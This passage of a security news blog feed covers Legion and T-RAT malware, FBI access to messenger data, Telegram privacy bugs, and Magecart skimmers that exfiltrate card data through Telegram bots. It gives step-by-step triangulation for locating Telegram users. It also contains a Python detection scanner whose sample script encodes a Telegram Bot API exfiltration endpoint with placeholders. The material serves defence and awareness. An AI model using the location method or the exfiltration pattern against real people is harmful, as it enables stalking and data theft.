Other targeted services include SendGrid, Twilio, Nexmo, AWS, Mailgun, Plivo, ClickSend, Mandrill, Mailjet, MessageBird, Vonage, Exotel, OneSignal, Clickatell, and TokBox.

Image: Services being attacked by Legion

In addition, Legion extracts AWS credentials from insecure or misconfigured web servers and sends spam SMS to users of US operators, including AT&T, Sprint, T-Mobile, Verizon, and Virgin.

What is the goal?

The main goal of the malware is to use the infrastructure of hijacked services for subsequent attacks, including bulk spam mailings and opportunistic phishing campaigns.

The researchers also discovered a YouTube channel (created June 15, 2021) containing tutorial videos on Legion. Experts conclude that “the tool is widespread and most likely is paid malware.”

Image: “Educational videos” published by the hacker

The location of the creator of this tool, who uses the Telegram nickname forzatools, remains unknown, although the presence of comments in Indonesian in the code indicates that the developer may be Indonesian or located in that country.

Unlocking the Secrets of Messaging Apps: An In-Depth FBI Study Guide on Accessible Data for Law Enforcement
https://gridinsoft.com/blogs/fbi-study-guide-showed-what-data-officers-can-get-from-messengers/
Thu, 02 Dec 2021 06:08:00 +0000
An FBI study guide has been made publicly available as part of a Freedom of Information law request filed by Property of the People, an American non-profit organization that deals with government transparency.

The resulting document contains training tips for agents and explains what kind of data can be obtained from the operators of various messengers and what legal permissions will be required for this.

Image: Secure Messaging Apps Data

The document is dated January 7, 2021, and, in general, does not contain any fundamentally new information, but it gives a good idea of what information the FBI can currently receive from services such as iMessage, Line, WhatsApp, Signal, Telegram, Threema, Viber, WeChat and Wickr.

It was previously known that the FBI has legal leverage to obtain personal information even from the operators of secure messengers (which usually focus on confidentiality), as Forbes reporter Thomas Brewster said on Twitter.

In general, the training document confirms that usually the FBI cannot access the encrypted messages themselves, but they can request other types of information that can also be useful in investigations.

Application: legal permissions and other details

Apple iMessage: reading message content is limited.
  • Subpoena: helps obtain basic subscriber information.
  • 18 USC §2703(d): helps identify iMessage requests for 25 days from the specified date.
  • Pen register: impossible.
  • Search warrant: helps obtain backups from the target device; if the target uses iCloud backups, encryption keys must be provided, and iMessages can also be retrieved from iCloud if the target has activated Messages in iCloud.

Line: reading message content is limited.
  • Registration data of the suspect and/or victim (profile picture, name, email address, phone number, LINE ID, registration date, etc.).
  • Usage information.
  • Content of text chats for a maximum of 7 days for specified users (only if end-to-end encryption is not active and not used, and only if a valid warrant is received; videos, images, files, location data, voice calls, and other such data will not be disclosed).

Signal: the content of messages cannot be read.
  • Date and time of user registration.
  • Last date when the user connected to the service.

Telegram: the content of messages cannot be read.
  • User contact information is not provided to law enforcement in order to comply with a court order.
  • According to Telegram’s privacy statement, Telegram may disclose the IP address and phone number to the relevant authorities for confirmed terrorist investigations.

Threema: the content of messages cannot be read.
  • A hash of the phone number and email address, if provided by the user.
  • Push token, if a push service is used.
  • Public key.
  • Date (no time) when the Threema ID was created.
  • Date (no time) of last login.

Viber: the content of messages cannot be read.
  • Provided credentials (i.e. phone number), registration data, and IP address at the time of creation.
  • Message history: time, date, source number, and destination number.

WeChat: the content of messages cannot be read.
  • Subpoenas and account preservation requests are accepted, but data for accounts created in China is not provided.
  • For accounts outside China, basic information (name, phone number, email address, IP address) is provided and is retained as long as the account is active.

WhatsApp: reading message content is limited.
  • Subpoena: helps obtain basic subscriber data.
  • Court order: same as subpoena, plus information about blocked users.
  • Search warrant: lets you obtain contacts from the target’s address book and find out which WhatsApp users have the target in their address book.
  • Pen register: transmits source and destination metadata for every message every 15 minutes.
  • If the target is using an iPhone and iCloud backup is enabled, the data from iCloud may contain WhatsApp data, including the content of messages.

Wickr: the content of messages cannot be read.
  • The date and time the account was created.
  • The types of devices on which the application is installed.
  • Date of last use.
  • Number of messages.
  • The number of external IDs (email addresses and phone numbers) connected to the account, but not the IDs themselves in plaintext.
  • Avatar.
  • Limited information about recent changes to account settings, including adding or suspending devices (does not include message content or routing and delivery information).
  • Wickr version number.

Let me remind you that I also reported that FBI removed web shells from vulnerable Microsoft Exchange servers without informing owners.

Telegram for macOS did not delete self-destructing videos
https://gridinsoft.com/blogs/telegram-for-macos-did-not-delete-videos/
Mon, 15 Feb 2021 16:26:58 +0000
Telegram developers have fixed a bug due to which self-destructing audio and video were not removed from devices running macOS.

Let me remind you that in the secret chat mode, you cannot forward messages to other users, and it is also possible to configure automatic self-destruction of all messages and multimedia after a certain time.

Independent information security specialist Dhiraj Mishra discovered that in Telegram version 7.3, self-destructing messages were not completely deleted from the recipient’s device.

“While understanding the implementation of various security and privacy measures in Telegram, I identified that Telegram fails again in terms of handling the users’ data. Telegram, which has 500 million active users, suffers from a logical bug that exists in Telegram for macOS, which stores the local copy of received messages (audio/video) on a custom path even after those messages are deleted/disappeared from the secret chat,” Dhiraj Mishra wrote.

So, the expert noticed that on macOS, standard chats use a sandbox path where all received video and audio files are stored. The same path is used for secret chats, so the received media files remain there even after the messages in the chat itself have already destroyed themselves, as they should have.

“Bob (the attacker, using tdesktop on macOS) and Alice (the victim) have a secret chat, and Alice sends an audio/video message to Bob with a self-destruct timer of 20 seconds. Although the message is removed from the chat after 20 seconds, it is still available through Bob’s custom path, so here Telegram cannot ensure privacy for Alice. In general, the function of self-destruction and working without traces does not work,” the expert writes.

Additionally, Mishra discovered that Telegram was storing local access codes to unlock the app in plain text format. They were saved in the Users/[username]/Library/GroupContainers/6N38VWS5BX.ru.keepcoder.Telegram/accounts-metadata folder as JSON files.

The researcher discovered both problems at the end of December 2020, and they were fixed with the release of Telegram 7.4. Mishra received a reward of $3,000 for reporting both errors.

Let me remind you that I also reported that a researcher discovered vulnerability in Telegram, which allows to locate user.

Researcher discovered vulnerability in Telegram, which allows to locate user
https://gridinsoft.com/blogs/researcher-discovered-vulnerability-in-telegram-which-allows-to-locate-user/
Thu, 07 Jan 2021 10:20:03 +0000
A researcher discovered a vulnerability in Telegram. The messenger provides users with the “People Nearby” function, thanks to which it is possible to determine a user’s location with an accuracy of several tens of meters.

Enthusiast Ahmed Hasan posted a message about the vulnerability found on his blog.

Several years ago, he had already reported a similar flaw to the Line messenger development team. The creators of the messenger paid Hasan a bonus of $1,000 and fixed the problem.

“A few days ago, I installed Telegram, and I noticed that they have the same feature. I tried to see if I can unmask other users’ locations, and I found they have the same issue I discovered in the Line app a few years ago. I reported the problem to Telegram security, and they said it’s not an issue. If you enable the feature of making yourself visible on the map, you’re publishing your home address online. A lot of users don’t know this when they enable that feature,” wrote Ahmed Hasan.

Although Telegram only shows the distance to a particular user in the list, their exact location can be determined using triangulation.

“If you notice, Telegram is telling how far each person is from me. An adversary can spoof their location for three points and use them to draw three triangulation circles,” reports Ahmed Hasan.

To do this, you need to change your location twice, noting each time the distance to the user, and then draw on a map (for example, on Google Maps) three circles centred on your coordinates with a radius equal to the measured distance. The user will be at the intersection of the circles.


Let me remind you, by the way, that Researcher Earned $10,000 by Finding XSS Vulnerability in Google Maps.

Note that only users who have enabled the “People Nearby” function can be found this way.

“Telegram told me that this is not a problem. If you are using this feature, be sure to disable it, unless you want your location to be available to everyone,” said Ahmed Hasan.

It should be noted that other applications use alternative solutions for calculating the distance between users, such as adding a random offset to the coordinates, which makes it impossible to determine the real geolocation; in the case of Telegram, the developers decided to neglect this additional security measure.

New T-RAT malware can be controlled via Telegram
https://gridinsoft.com/blogs/new-t-rat-malware-can-be-controlled-via-telegram/
Sat, 24 Oct 2020 09:09:46 +0000
G DATA’s specialists have published a report on the new T-RAT malware, which is being distributed for only $45. The main feature of the malware is that T-RAT allows controlling infected systems through a Telegram channel, rather than through a web administration panel, as is usually done.

Malware creators claim that this provides faster and easier access to infected computers from anywhere, and allows them to quickly steal data. However, T-RAT can also be controlled by more traditional methods, for example via RDP and VNC.

“The T-RAT Telegram channel supports 98 commands that allow retrieving passwords and cookies from the browser, navigating the victim’s file system and searching for confidential data, deploying a keylogger, secretly recording sound through the device microphone, taking screenshots of the victim’s desktop, taking snapshots via the webcam and intercepting the contents of the clipboard,” say G DATA experts.

In addition, T-RAT owners can use a special mechanism for capturing data from the clipboard, which replaces strings similar to addresses of cryptocurrency and electronic wallets with the addresses of attackers. This allows successfully intercepting Qiwi, WMR, WMZ, WME, WMX, Yandex.Money, Payeer, CC, BTC, BTCG, Ripple, Dogecoin and Tron transactions.

The malware is also capable of working with terminal commands (CMD and PowerShell), blocking the victim’s access to certain sites (for example, antivirus and technical support sites), eliminating specific processes (disabling security and debugging software), and even deactivating the Taskbar and Task Manager.

G DATA experts write that T-RAT is just one of many malware families equipped with the ability to be controlled via Telegram, and this is not the first RAT that operates on such a model. Similar functionality is found in RATAttack (targeting Windows), HeroRAT (targeting Android), TeleRAT (used mainly against users from Iran, targeting Android), IRRAT (targeting Android), RAT-via-Telegram (available on GitHub, targeting Windows users) and Telegram-RAT (available on GitHub, targeting Windows users).

“New T-RAT samples are regularly uploaded to VirusTotal. I assume that it is actively spreading, although I have no direct evidence of this,” says company expert Karsten Hahn.

Let me remind fans of classic horror stories about viruses and monsters about the Alien malware that steals passwords from 226 Android apps.

Magecart groupings extract stolen cards data via Telegram
https://gridinsoft.com/blogs/magecart-groupings-extract-stolen-cards-data-via-telegram/
Fri, 04 Sep 2020 16:12:42 +0000
An information security specialist known under the pseudonym Affable Kraut discovered that Magecart web skimmer operators extract stolen cards data through Telegram channels.

He concluded this based on information obtained by Sansec, which specializes in combating digital skimming and Magecart attacks.

Let me remind you that initially the name MageCart was assigned to one hack group, which was the first to introduce web skimmers (malicious JavaScript) on the pages of online stores to steal bank card data.

“Such an approach was so successful that the group soon had numerous imitators, and the name MageCart became a common name, and now it refers to a whole class of such attacks,” recall specialists of the information security company RiskIQ.

While in 2018 RiskIQ researchers identified 12 such groups, by the end of 2019 there were already about 40 of them.

The researcher studied one of these malicious JavaScript skimmers and noticed that it collects all data from the input fields filled in by victims and sends it to Telegram.


All transmitted information is encrypted using a public key, and having received it, a special Telegram bot sends the stolen data to the chat in the form of ordinary messages.


Affable Kraut notes that this method of data theft, apparently, is very effective, but it has a significant disadvantage: anyone who has a token for a Telegram bot can take control of the process.

Malwarebytes’ leading researcher, Jérôme Segura, was also interested in the script, and after examining it, he said that the author of this web skimmer used a simple Base64 for the bot ID, Telegram channel and API requests. Below you can see the diagram left by Segura and describing the entire attack process.


The researcher notes that data theft occurs only if the current URL in the browser contains one of the keywords indicating that this is an online store, and only when the user confirms the purchase. The payment details will then be sent to both the payment processor and the cybercriminals.

Jérôme Segura writes that such a data extraction mechanism is a very practical solution, because it allows attackers not to worry about creating a special infrastructure for these purposes. In addition, it will not be easy to defend against this type of skimmer. Blocking Telegram connections will be only a temporary solution, since then the attackers can start using another legitimate service, which will also mask the “leak” of data.

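As an added example (not code from the post, Sansec or Malwarebytes), the following Python scanner turns Segura’s observation that the bot ID, channel and API requests were hidden behind plain Base64 into a check a site owner can run over their own scripts: it decodes every Base64-looking string literal and flags those that resolve to Telegram Bot API indicators. The sample script, the token and chat placeholders and the indicator list are all constructed here for the example.

```python
"""Detect Base64-obfuscated Telegram Bot API indicators in a JavaScript file."""
import base64
import binascii
import re
from typing import Dict, List, Optional

# Substrings that, once decoded, point at Telegram Bot API exfiltration.
# Assumption: this indicator list is chosen for the example, not taken from any vendor.
INDICATORS = ("api.telegram.org", "/bot", "sendmessage", "chat_id=")

# A quoted string literal whose whole body looks like Base64 (16+ chars).
_B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{16,}={0,2})["']""")


def decode_b64(candidate: str) -> Optional[str]:
    """Decode a Base64 literal to printable text; None if it is not valid
    Base64 or does not decode to printable UTF-8 (random data, binary)."""
    try:
        raw = base64.b64decode(candidate, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def scan_script(source: str) -> List[Dict[str, str]]:
    """Return one finding per Base64 literal whose decoded value contains an
    indicator: the raw literal, its decoded form and the indicators hit."""
    findings = []
    for match in _B64_LITERAL.finditer(source):
        literal = match.group(1)
        decoded = decode_b64(literal)
        if decoded is None:
            continue
        lowered = decoded.lower()
        hits = [ind for ind in INDICATORS if ind in lowered]
        if hits:
            findings.append(
                {"literal": literal, "decoded": decoded, "indicators": ", ".join(hits)}
            )
    return findings


def b64_of(text: str) -> str:
    """Helper used only to build the constructed sample below."""
    return base64.b64encode(text.encode()).decode()


# Constructed sample script: a harmless stand-in for the skimmer's obfuscated
# strings. Token and chat id are placeholders, not values from any incident.
SAMPLE_SCRIPT = (
    'var k = ["checkout", "onepage", "cart"];\n'
    'var u = atob("' + b64_of("https://api.telegram.org/bot<TOKEN_PLACEHOLDER>/sendMessage") + '");\n'
    'var c = atob("' + b64_of("chat_id=<CHAT_ID_PLACEHOLDER>") + '");\n'
    'var note = atob("' + b64_of("plain text that is not an indicator") + '");\n'
)

if __name__ == "__main__":
    for finding in scan_script(SAMPLE_SCRIPT):
        print(f"{finding['indicators']:40} <- {finding['decoded']}")
```

Run it against the JavaScript served on a checkout page; a literal that decodes to a Bot API endpoint or a chat_id parameter is worth a closer look even when the surrounding code appears benign.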

Let me remind you that scientists have developed an attack that allows not to enter a PIN code while paying with Visa cards.
